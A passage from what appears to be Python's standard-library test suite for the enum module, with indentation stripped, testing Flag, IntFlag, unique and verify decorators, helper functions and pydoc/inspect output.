self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
@unittest.skipUnless(
python_version < (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_format(self):
with self.assertWarns(DeprecationWarning):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'GREEN' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RW' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertTrue(Color.GREEN in Open)
self.assertTrue(Open.RW in Color)
self.assertFalse('GREEN' in Color)
self.assertFalse('RW' in Open)
self.assertTrue(2 in Color)
self.assertTrue(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestVerify(unittest.TestCase):
def test_continuous(self):
@verify(CONTINUOUS)
class Auto(Enum):
FIRST = auto()
SECOND = auto()
THIRD = auto()
FORTH = auto()
#
@verify(CONTINUOUS)
class Manual(Enum):
FIRST = 3
SECOND = 4
THIRD = 5
FORTH = 6
#
with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'):
@verify(CONTINUOUS)
class Missing(Enum):
FIRST = 3
SECOND = 4
THIRD = 11
FORTH = 13
#
with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'):
@verify(CONTINUOUS)
class Incomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 16
FORTH = 64
#
with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'):
@verify(CONTINUOUS)
class StillIncomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 11
FORTH = 32
def test_composite(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(Flag):
b = 3
c = 4
d = 6
#
self.assertEqual(enum.show_flag_values(3), [1, 2])
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(IntFlag):
c = 4
d = 6
self.assertEqual(enum.show_flag_values(2), [2])
def test_unique_clean(self):
@verify(UNIQUE)
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@verify(UNIQUE)
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@verify(UNIQUE)
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@verify(UNIQUE)
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestHelpers(unittest.TestCase):
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
self.assertTrue(enum._is_sunder(name), '%r is a not sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
self.assertTrue(enum._is_dunder(name), '%r is a not dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
self.assertTrue(enum._is_private('MyEnum', name), '%r is a not private name?')
for name in self.sunder_names + self.dunder_names + self.random_names:
self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?')
class TestEnumTypeSubclassing(unittest.TestCase):
pass
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
